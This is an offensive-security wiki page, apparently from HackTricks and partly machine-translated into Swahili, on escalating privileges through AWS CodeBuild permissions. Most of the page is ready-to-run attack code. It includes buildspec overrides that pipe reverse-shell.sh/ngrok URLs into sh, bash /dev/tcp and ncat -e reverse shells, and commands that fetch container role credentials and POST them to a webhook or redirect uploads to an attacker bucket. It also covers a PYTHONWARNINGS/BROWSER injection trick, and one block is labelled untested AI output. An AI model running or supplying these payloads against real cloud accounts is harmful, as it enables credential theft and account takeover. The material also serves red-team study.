AWS - Codebuild Privesc

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

codebuild

Pata maelezo zaidi katika:

AWS - Codebuild Enum

codebuild:StartBuild | codebuild:StartBuildBatch

Kuwa na moja tu ya ruhusa hizi inatosha kuanzisha build kwa buildspec mpya na kuiba token ya iam role iliyoteuliwa kwa mradi:

cat > /tmp/buildspec.yml <<EOF
version: 0.2

phases:
build:
commands:
- curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
EOF

aws codebuild start-build --project <project-name> --buildspec-override file:///tmp/buildspec.yml

cat > /tmp/buildspec.yml <<EOF
version: 0.2

batch:
fast-fail: false
build-list:
- identifier: build1
env:
variables:
BUILD_ID: build1
buildspec: |
version: 0.2
env:
shell: sh
phases:
build:
commands:
- curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
ignore-failure: true
EOF

aws codebuild start-build-batch --project <project-name> --buildspec-override file:///tmp/buildspec.yml

Kumbuka: Tofauti kati ya amri hizi mbili ni kwamba:

• StartBuild huanzisha kazi moja ya build kwa kutumia buildspec.yml maalum.
• StartBuildBatch inakuwezesha kuanzisha batch ya builds, na usanidi tata zaidi (kama kuendesha builds nyingi sambamba).

Athari Zinazowezekana: privesc ya moja kwa moja kwa AWS Codebuild roles zilizoambatishwa.

Override ya Env Var ya StartBuild

Hata kama huwezi kubadilisha project (UpdateProject) na huwezi ku-override buildspec, codebuild:StartBuild bado inaruhusu ku-override env vars wakati wa build kupitia:

• CLI: --environment-variables-override
• API: environmentVariablesOverride

Ikiwa build inatumia environment variables kudhibiti tabia (destination buckets, feature flags, proxy settings, logging, n.k.), hii inaweza kutosha ili exfiltrate secrets ambazo build role inaweza kufikia au kupata code execution ndani ya build.

Mfano 1: Elekeza Artifact/Upload Destination ili Exfiltrate Secrets

Ikiwa build inachapisha artifact kwenye bucket/path inayodhibitiwa na env var (kwa mfano UPLOAD_BUCKET), i-override kwenda attacker-controlled bucket:

export PROJECT="<project-name>"
export EXFIL_BUCKET="<attacker-controlled-bucket>"

export BUILD_ID=$(aws codebuild start-build \
--project-name "$PROJECT" \
--environment-variables-override name=UPLOAD_BUCKET,value="$EXFIL_BUCKET",type=PLAINTEXT \
--query build.id --output text)

# Wait for completion
while true; do
STATUS=$(aws codebuild batch-get-builds --ids "$BUILD_ID" --query 'builds[0].buildStatus' --output text)
[ "$STATUS" = "SUCCEEDED" ] && break
[ "$STATUS" = "FAILED" ] || [ "$STATUS" = "FAULT" ] || [ "$STATUS" = "STOPPED" ] || [ "$STATUS" = "TIMED_OUT" ] && exit 1
sleep 5
done

# Example expected location (depends on the buildspec/project logic):
aws s3 cp "s3://$EXFIL_BUCKET/uploads/$BUILD_ID/flag.txt" -

Mfano 2: Python Startup Injection kupitia PYTHONWARNINGS + BROWSER

Ikiwa build inafanya kazi python3 (kawaida katika buildspecs), wakati mwingine unaweza kupata code execution bila kugusa buildspec kwa kutumia zifuatazo:

• PYTHONWARNINGS: Python inatatua uwanja wa category na ita-import dotted paths. Kuweka hiyo kuwa ...:antigravity.x:... inalazimisha ku-import module ya stdlib antigravity.
• antigravity: huita webbrowser.open(...).
• BROWSER: inasimamia kile webbrowser inatekeleza. Kwa Linux ni :-separated. Kutumia #%s kunafanya hoja ya URL kuwa shell comment.

Hii inaweza kutumika kuchapisha CodeBuild role credentials (kutoka http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI) ndani ya CloudWatch logs, kisha kuzipata tena ikiwa una ruhusa za kusoma logs.

iam:PassRole, codebuild:CreateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Mshambuliaji mwenye ruhusa za iam:PassRole, codebuild:CreateProject, and codebuild:StartBuild or codebuild:StartBuildBatch angeweza kuinua mamlaka hadi jukumu lolote la IAM la codebuild kwa kuunda moja inayofanya kazi.

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

JSON="{
\"name\": \"codebuild-demo-project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"


REV_PATH="/tmp/rev.json"

printf "$JSON" > $REV_PATH

# Create project
aws codebuild create-project --name codebuild-demo-project --cli-input-json file://$REV_PATH

# Build it
aws codebuild start-build --project-name codebuild-demo-project

# Wait 3-4 mins until it's executed
# Then you can access the logs in the console to find the AWS role token in the output

# Delete the project
aws codebuild delete-project --name codebuild-demo-project

# Generated by AI, not tested
# Create a buildspec.yml file with reverse shell command
echo 'version: 0.2
phases:
build:
commands:
- curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash' > buildspec.yml

# Upload the buildspec to the bucket and give access to everyone
aws s3 cp buildspec.yml s3:<S3_BUCKET_NAME>/buildspec.yml

# Create a new CodeBuild project with the buildspec.yml file
aws codebuild create-project --name reverse-shell-project --source type=S3,location=<S3_BUCKET_NAME>/buildspec.yml --artifacts type=NO_ARTIFACTS --environment computeType=BUILD_GENERAL1_SMALL,image=aws/codebuild/standard:5.0,type=LINUX_CONTAINER --service-role <YOUR_HIGH_PRIVILEGE_ROLE_ARN> --timeout-in-minutes 60

# Start a build with the new project
aws codebuild start-build --project-name reverse-shell-project

# Generated by ex16x41, tested
# Create a hook.json file with command to send output from curl credentials URI to your webhook address

{
"name": "user-project-1",
"source": {
"type": "NO_SOURCE",
"buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n      - curl \"http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI\" | curl -X POST -d @- WEBHOOK URL\n"
},
"artifacts": {
"type": "NO_ARTIFACTS"
},
"environment": {
"type": "LINUX_CONTAINER",
"image": "public.ecr.aws/codebuild/amazonlinux2-x86_64-standard:4.0",
"computeType": "BUILD_GENERAL1_SMALL"
},
"serviceRole": "ARN-OF-TARGET-ROLE"
}

# Create a new CodeBuild project with the hook.json file
aws codebuild create-project --cli-input-json file:///tmp/hook.json

# Start a build with the new project
aws codebuild start-build --project-name user-project-1

# Get Credentials output to webhook address
Wait a few seconds to maybe a couple minutes and view the POST request with data of credentials to pivot from

Athari Inayoweza Kutokea: Direct privesc to any AWS Codebuild role.

Warning

Katika Codebuild container faili /codebuild/output/tmp/env.sh ina env vars zote zinazohitajika kupata metadata credentials.

Faili hii ina env variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI ambayo ina URL path ya kufikia credentials. Itakuwa kama hii /v2/credentials/2817702c-efcf-4485-9730-8e54303ec420

Ongeza hiyo kwenye URL http://169.254.170.2/ na utaweza dump the role credentials.

Zaidi ya hayo, pia ina env variable ECS_CONTAINER_METADATA_URI ambayo ina URL kamili ya kupata metadata info kuhusu container.

iam:PassRole, codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Kama ilivyo katika sehemu iliyopita, badala ya kuunda build project ukibadilisha, unaweza kueleza the IAM Role na kuiba the token

REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"

printf "$JSON" > $REV_PATH

aws codebuild update-project --name codebuild-demo-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name codebuild-demo-project

Athari Inayoweza Kutokea: Privesc ya moja kwa moja kwa role yoyote ya AWS Codebuild.

codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Kama katika sehemu iliyopita lakini bila ruhusa ya iam:PassRole, unaweza kutumia vibaya ruhusa hizi ili kubadilisha miradi ya Codebuild iliyopo na kupata ufikiaji wa role waliyopewa tayari.

REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"

JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
\"computeType\": \"BUILD_GENERAL1_SMALL\",
\"imagePullCredentialsType\": \"CODEBUILD\"
}
}"

# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!

printf "$JSON" > $REV_PATH

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name codebuild-demo-project

REV_PATH="/tmp/codebuild_pwn.json"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"project_name\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n  fast-fail: false\\\\n  build-list:\\\\n    - identifier: build1\\\\n      env:\\\\n        variables:\\\\n          BUILD_ID: build1\\\\n      buildspec: |\\\\n        version: 0.2\\\\n        env:\\\\n          shell: sh\\\\n        phases:\\\\n          build:\\\\n            commands:\\\\n              - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n      ignore-failure: true\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
\"computeType\": \"BUILD_GENERAL1_SMALL\",
\"imagePullCredentialsType\": \"CODEBUILD\"
}
}"

printf "$JSON" > $REV_PATH

# Note how it's used a image from AWS public ECR instead from dockerhub as dockerhub rate limits CodeBuild!

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build-batch --project-name codebuild-demo-project

Athari Inayowezekana: Privesc ya moja kwa moja kwa roles za AWS Codebuild zilizounganishwa.

SSM

Ikiwa una idhini za kutosha kuanzisha kikao cha ssm inawezekana kupata ndani ya Codebuild project inayojengwa.

Mradi wa Codebuild utahitaji kuwa na breakpoint:

phases:
pre_build:
commands:
- echo Entered the pre_build phase...
- echo "Hello World" > /tmp/hello-world
      - codebuild-breakpoint

Na kisha:

aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
aws ssm start-session --target <sessionTarget> --region <region>

For more info check the docs.

(codebuild:StartBuild | codebuild:StartBuildBatch), s3:GetObject, s3:PutObject

Attacker anayeweza kuanzisha au kurestart build ya project maalum ya CodeBuild ambayo inahifadhi faili yake ya buildspec.yml kwenye S3 bucket ambayo attacker ana write access, anaweza kupata command execution katika mchakato wa CodeBuild.

Kumbuka: ongezeko la mamlaka linahusiana tu ikiwa CodeBuild worker ana role tofauti, ambayo, kwa matumaini, ina ruhusa zaidi kuliko ile ya attacker.

aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./

vim ./buildspec.yml

# Add the following lines in the "phases > pre_builds > commands" section
#
#    - apt-get install nmap -y
#    - ncat <IP> <PORT> -e /bin/sh

aws s3 cp ./buildspec.yml s3://<build-configuration-files-bucket>/buildspec.yml

aws codebuild start-build --project-name <project-name>

# Wait for the reverse shell :)

Unaweza kutumia kitu kama hiki buildspec kupata reverse shell:

version: 0.2

phases:
build:
commands:
- bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1

Impact: Direct privesc kwa role inayotumika na worker wa AWS CodeBuild ambayo kwa kawaida ina ruhusa za juu.

Warning

Kumbuka kwamba buildspec inaweza kutegemewa kuwa katika format ya zip, hivyo mshambuliaji atalazimika kupakua, unzip, kubadilisha buildspec.yml kutoka kwenye root directory, zip tena na kupakia

Maelezo zaidi yanaweza kupatikana hapa.

Potential Impact: Direct privesc kwa AWS Codebuild roles zilizoambatanishwa.

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.